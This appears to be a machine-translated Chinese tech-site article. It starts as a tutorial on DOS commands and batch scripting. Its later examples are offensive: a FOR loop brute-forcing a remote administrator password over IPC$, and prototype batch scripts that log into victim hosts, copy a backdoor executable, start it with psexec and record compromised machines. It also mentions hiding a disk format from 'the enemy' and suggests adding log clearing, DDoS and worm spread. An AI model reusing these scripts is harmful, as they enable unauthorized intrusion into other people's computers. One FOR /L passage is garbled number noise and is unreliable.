Shulou(Shulou.com)06/01 Report--

1. Common commands of DOS:

(1) View directory contents command DIR

(2) specify executable search directory PATH

(3) create directory command MD

(4) change the current directory command CD

(5) Delete subdirectory order RD

(6) change the current drive letter command C:

(7) File copy command COPY

(8) display text file contents command TYPE

(9) change the file name command REN

(10) delete file command DEL

Example: cd\: return the root directory, such as C disk, d disk and so on.

D: switch disk

C:\ > cd fox\ user (enter the user subdirectory under the Foxx subdirectory) backslash

C:\ fox\ user > cd.. (return to the root directory one level up, and notice that cd is followed by two dots "..")

Md 1: create a folder, rd 1: delete a folder

Edit 1.txt: edit 1.txt under dos

/?: view the command introduction

F7: view history commands, up arrow "↑" and down arrow "↓" and right arrow-look back at the last command executed

"Ctrl+C" or "Break" key combination: interrupts an operation

Type 1.txt: viewing the contents of the 1.txt file

Del 1.txt: deleting 1.txt

Copy 1.txt 2.txt: copy 1.txt to 2.txt

Cls: clear the screen

Tree: I'm a little confused, too.

2. Batch command: change to a better way to save trouble and learn

1.Echo command

Turn on or off the request echo feature, or display messages. If there are no parameters, the echo command displays the current echo settings.

Grammar

Echo [{on | off}] [message]

Sample echo off / echo hello world

In practical application, we will combine this command with redirection symbols (also known as pipe symbols, usually use > > ^) to input some commands into files of a specific format. This will be reflected in future examples.

2.@ command

Indicates that the commands after @ are not displayed, so you will not be able to let the other party see the commands you use during the * process (such as using batch processing to format the enemy's hard drive).

Sample:@echo off

@ echo Now initializing the program,please wait a minite...

@ format X: / q/u/autoset (the / y parameter is not allowed in the format command, but the good news is that Microsoft left an autoset parameter for us, and the effect is the same as / y.)

3.Goto command

Specify to jump to the label, and when the tag is found, the program will process the command that starts on the next line.

Syntax: goto label (label is a parameter that specifies the lines in the batch program to be directed to. )

Sample:

If {% 1} = = {} goto noparms

If {% 2} = {} goto noparms (if you don't understand the if,% 1,% 2 here, skip it first, and there will be a detailed explanation later. )

@ Rem check parameters if null show usage

: noparms

Echo Usage: monitor.bat ServerIP PortNumber

Goto end

The name of the tag can be chosen at will, but it is better to have a meaningful letter, preceded by a letter: to indicate that the letter is a label, and the goto command is based on this: to find the next step to jump there. You'd better have some instructions so that you and others will seem to understand your intentions.

4.Rem command

The comment command, which is equivalent to / *-/ in the C language, is not executed, but acts as a comment for others to read and you to modify later.

Rem Message

Sample:@Rem Here is the description.

5.Pause command

When you run the Pause command, the following message is displayed:

Press any key to continue. . .

Sample:

@ echo off

: begin

Copy aRom back. * d:\

Echo Please put a new disk into driver A

Pause

Goto begin

In this example, all files on disk in drive An are copied to d:\ back. When the comment that appears prompts you to put another disk in drive A, the pause command suspends the program so that you can replace the disk and press any key to continue processing.

6.Call command

Calls from one batch program to another without terminating the parent batch program. The call command accepts the label that is used as the target of the call. If you use Call outside of a script or batch file, it will not work on the command line.

Grammar

Call [[Drive:] [Path] FileName [BatchParameters]] [: label [arguments]]

Parameters.

[Drive:} [Path] FileName

Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension.

7.start command

Call external programs, all DOS commands and command-line programs can be called by the start command.

* Common parameters:

Window minimization at the beginning of MIN

SEPARATE starts a 16-bit Windows program in a separate space

HIGH starts the application in the HIGH priority category

REALTIME starts the application in the REALTIME priority category

WAIT starts the application and waits for it to finish

Parameters these are the parameters passed to the command / program

When the executing application is a 32-bit GUI application, CMD.EXE returns a command prompt without waiting for the application to terminate. If executed within a command script, the new behavior does not occur.

8.choice command

Choice uses this command to allow the user to enter a character to run different commands. The / c: parameter should be added when in use, and the characters that can be prompted for input should be written after c:, with no space between them. Its return code is 1234...

Such as: choice / c:dme defrag,mem,end

Will be displayed

Defrag,mem,end [D,M,E]?

Sample:

The Sample.bat is as follows:

@ echo off

Choice / c:dme defrag,mem,end

If errorlevel 3 goto defrag (the error code with the highest value should be judged first)

If errorlevel 2 goto mem

If errotlevel 1 goto end

: defrag

C:\ dos\ defrag

Goto end

: mem

Mem

Goto end

: end

Echo good bye

After this file is run, it will display defrag,mem,end [DJI MJE]? The user can select d me, and then the if statement will make a judgment. D means to execute the program segment labeled defrag, m means to execute the program segment labeled mem, e means to execute the program segment labeled end, and each program segment finally jumps the program to the end label with goto end, and then the program will display good bye and the file will end.

9.If command

If said it would determine whether the specified conditions were met and then decide to execute different orders. There are three formats:

1. If "parameter" = = "string" command to be executed

If the parameter is equal to the specified string, the condition holds, run the command, otherwise run the next sentence. (note that there are two equal signs)

For example, if "% 1" = "a" format a:

If {% 1} = = {} goto noparms

If {% 2} = = {} goto noparms

2. If exist file name command to be executed

If there is a specified file, the condition is established, run the command, otherwise run the next sentence.

Such as if exist config.sys edit config.sys

3. If errorlevel / if not errorlevel digital commands to be executed

If the return code is equal to the specified number, the condition holds, run the command, otherwise run the next sentence.

Such as if errorlevel 2 goto x2

When the DOS program runs, it will return a number to DOS, which is called error code errorlevel or return code. The common return codes are 0,1.

10.for command

The for command is a complex command, which is mainly used for parameters to cycle through the command within a specified range.

Use% variable to specify variables when using the FOR command in a batch file

For {% variable |% variable} in (set) do command [CommandLineOptions]

% variable specifies a parameter that can be replaced by a single letter.

(set) specify a file or group of files. You can use wildcards.

Command specifies the commands to be executed on each file.

Command-parameters specifies parameters or command line switches for specific commands.

Use% variable to specify variables when using the FOR command in a batch file

Instead of using% variable. Variable names are case-sensitive, so% I is different from% I

If the command extension is enabled, the following additional FOR command formats are subject to

Support:

FOR / D% variable IN (set) DO command [command-parameters]

If the set contains wildcards, specify to match the directory name, not the file

The first name matches.

FOR / R [[drive:] path]% variable IN (set) DO command [command-

Check the directory tree rooted in [drive:] path and point to the

FOR statement. If no directory is specified after / R, the current

Catalogue. If the set is only a single point (.) Character, the directory tree is enumerated.

FOR / L% variable IN (start,step,end) DO command [command-para

This set represents a sequence of numbers from beginning to end in increments.

Therefore, the sequence 1, 2, 3, 4, 5, 1, 2, 3, 4, 5, 5, 5, 4, 4, 5, 5, 5, 4, 4, 5, 5, 5, 5, 4, 4, 5, 5, 5, 4, 4, 5, 5, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 4, 5, 1, 4, 4, 4, 4, 5, 5, 4, 4, 4, 5, 5, 4, 4, 4, 5, 5, 4, 4, 4, 5, 1, 4,

Sequence (5-4-3-21).

FOR / F ["options"]% variable IN (file-set) DO command

FOR / F ["options"]% variable IN ("string") DO command

FOR / F ["options"]% variable IN (command) DO command

Or, if you have the usebackq option:

FOR / F ["options"]% variable IN (file-set) DO command

FOR / F ["options"]% variable IN ("string") DO command

FOR / F ["options"]% variable IN (command) DO command

Filenameset is one or more file names. Continue to the filenameset

Before the next file, each file has been opened, read, and processed.

Processing involves reading the file, dividing it into lines of text, and then dividing each line

Parse to zero or more symbols. Then use the value of the symbol string variable found

Call the For loop. By default, / F is separated by each line of each file

The first blank symbol of the Skip the blank line. You can specify the optional "options"

Parameter overrides the default resolution operation. This quoted string consists of one or more

Specify keywords for different parsing options. These keywords are:

Eol=c-refers to the end of a line comment character (just one)

Skip=n-refers to the number of lines ignored at the beginning of the file.

Delims=xxx-refers to the delimiter set. This replaces spaces and tabs

Default delimiter set.

Tokens=x,y,m-n-refers to which symbol of each line is passed to each iteration

The for itself. This results in an additional variable name

The format is a range. Specify m by nth symbol

The last character in a symbol string, an asterisk.

Then the extra variable will be parsed in the last symbol.

Assign and accept reserved text for lines.

Usebackq-specifies that the new syntax has been used in the following class cases:

A string in quotation marks is executed as a command and

The quotation mark character is a text string command and is allowed in fi

Use double quotation marks to expand the file name in.

Sample1:

FOR / F "eol=; tokens=2,3* delims=," I in (myfile.txt) do command

Parses every line in the myfile.txt, ignores those that start with a semicolon, and sets the

The second and third symbols in each line are passed to the body of the for program; use commas and / or

Space delimiting symbol. Note that the statement in the body of this for program refers to% I

Get the second symbol, reference% j to get the third symbol, reference% k

To get all the remaining symbols after the third symbol. For files with spaces

Name, you need to enclose the file name in double quotes. In order to make in this way

With double quotes, you also need to use the usebackq option, otherwise, double quotes will

Is understood to be used to define a string to parse.

% I is specified specifically in the for statement,% j and% k are specified through the

The tokens= option is specifically explained. You can go through the tokens= line

Specify a maximum of 26 symbols, as long as you do not attempt to indicate a higher than the letter z or

The variable of Z. Remember, FOR variables are single-letter, case-sensitive, and global

At the same time, there cannot be more than 52 in use.

You can also use FOR / F parsing logic on adjacent strings by

Enclose the filenameset between parentheses in single quotation marks. This way, the character

The string is treated as a single input line in a file.

Finally, you can analyze the output of the command with the FOR / F command. The way is to set the

The filenameset between the parentheses becomes an anti-parenthesis string. The string will

Is treated as a command line, passed to a child CMD.EXE, and its output is caught in the

Memory and is analyzed as a file. Therefore, the following examples:

FOR / F "usebackq delims=="% I IN (`set`) DO @ echo% I

Enumerates the environment variable names in the current environment.

In addition, the replacement of FOR variable references has been enhanced. You can now use the following

Option syntax:

~ I-remove any quotation marks ("), expand% I

% ~ fI-extends% I to a fully qualified pathname

% ~ dI-expand% I to only one drive letter

% ~ pI-extends% I to only one path

% ~ nI-extends% I to only one file name

% ~ xI-extends% I to only one file extension

% ~ sI-the extended path contains only short names

% ~ aI-extends% I to the file attributes of the file

% ~ tI-extends% I to the date / time of the file

% ~ zI-extends% I to the size of the file

% ~ $PATH:I-find the directory listed in the path environment variable and extend% I

To the first fully qualified name found. If the environment variable

If the file is not defined or the file is not found, this key combination expands

Empty string

You can combine modifiers to get multiple results:

% ~ dpI-extends% I to only one drive letter and path

% ~ nxI-extends% I only to a file name and extension

% ~ fsI-only extends% I to a full pathname with a short name

% ~ dp$PATH:i-find the directory listed in the path environment variable and extend% I

To the first drive letter and path found.

% ~ ftzaI-extends% I to DIR with similar output lines

In the above example,% I and PATH can be replaced with other valid values. % ~ Grammar

Terminate with a valid FOR variable name. Select an uppercase variable name similar to% I

It is easier to read and avoid confusion with key combinations regardless of case.

The above is the official help of MS. Let's give a few examples to illustrate the use of the For command in *.

Sample2:

Use the For command to crack the brute force password of a target Win2k host.

We use net use\ ip\ ipc$ "password" / u: "administrator" to try to connect to the target host, and write down the password when successful.

The main command is one: for / fi% in (dict.txt) do net use\\ ip\ ipc$ "I%" / u: "administrator"

The password of admin is represented by I%. In dict.txt, the value of I% is connected with the net use command. Then pass the running result of the program to the find command--

For / fi%% in (dict.txt) do net use\\ ip\ ipc$ "I%%" / u: "administrator" | find ": command completed successfully" > > D:\ ok.txt, so ko.

Sample3:

Have you ever had a lot of broilers waiting for you to grow at the back door? When the number is very large, the originally very happy thing will become very depressed. The article begins with the use of batch files, which can simplify day-to-day or repetitive tasks. So how to achieve it? Ha ha, you will understand if you look at it.

There is only one main command: (when using the FOR command in a batch file, the specified variable uses% variable)

@ for / f "tokens=1,2,3 delims=" I in (victim.txt) do start call door.bat I j k

For the use of tokens, see sample1 above, where it means that the contents of victim.txt are passed sequentially to the parameter% I% j% k in door.bat.

And cultivate.bat is nothing more than using the net use command to establish an IPC$ connection, and copy***+ the backdoor to victim, and then use the return code (If errorlever =) to screen the hosts that have successfully planted the backdoor, and echo it out, or echo to the specified file.

Delims= indicates that the content in the vivtim.txt is separated by a space. I want to see here, you must also understand what the content of this victim.txt is like. It should be arranged according to the objects represented by% I% j% k, which is usually ip password username.

Prototype code:

-cut here then save as a batchfile (I call it main.bat)-

@ echo off

@ if "% 1" = "" goto usage

@ for / f "tokens=1,2,3 delims=" I in (victim.txt) do start call IPChack.bat I j k

@ goto end

: usage

@ echo run this batch in dos modle.or just double-click it.

: end

-cut here then save as a batchfile (I call it main.bat)-

-cut here then save as a batchfile (I call it door.bat)-

@ net use\% 1\ ipc$% 3 / u: "% 2"

@ if errorlevel 1 goto failed

@ echo Trying to establish the IPC$ connection. OK

@ copy windrv32.exe\ 1\ admin$\ system32 & & if not errorlevel 1 echo IP 1 USER 2 PWD 3 > > ko.txt

@ p***ec\% 1 c:\ winnt\ system32\ windrv32.exe

@ p***ec\ 1 net start windrv32 & & if not errorlevel 1 echo 1 Backdoored > > ko.txt

: failed

@ echo Sorry can not connected to the victim.

-cut here then save as a batchfile (I call it door.bat)-

This is just a prototype of automatic backdoor batch processing, two batches and backdoor programs (Windrv32.exe), PSexec.exe needs to be placed in a unified directory. Batch processing content

It can also be extended, such as adding the function of clearing log + DDOS, adding the function of adding users regularly, and going deeper to make it have the function of automatic propagation (worm). There is no more description here. Interested friends can study it on their own.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.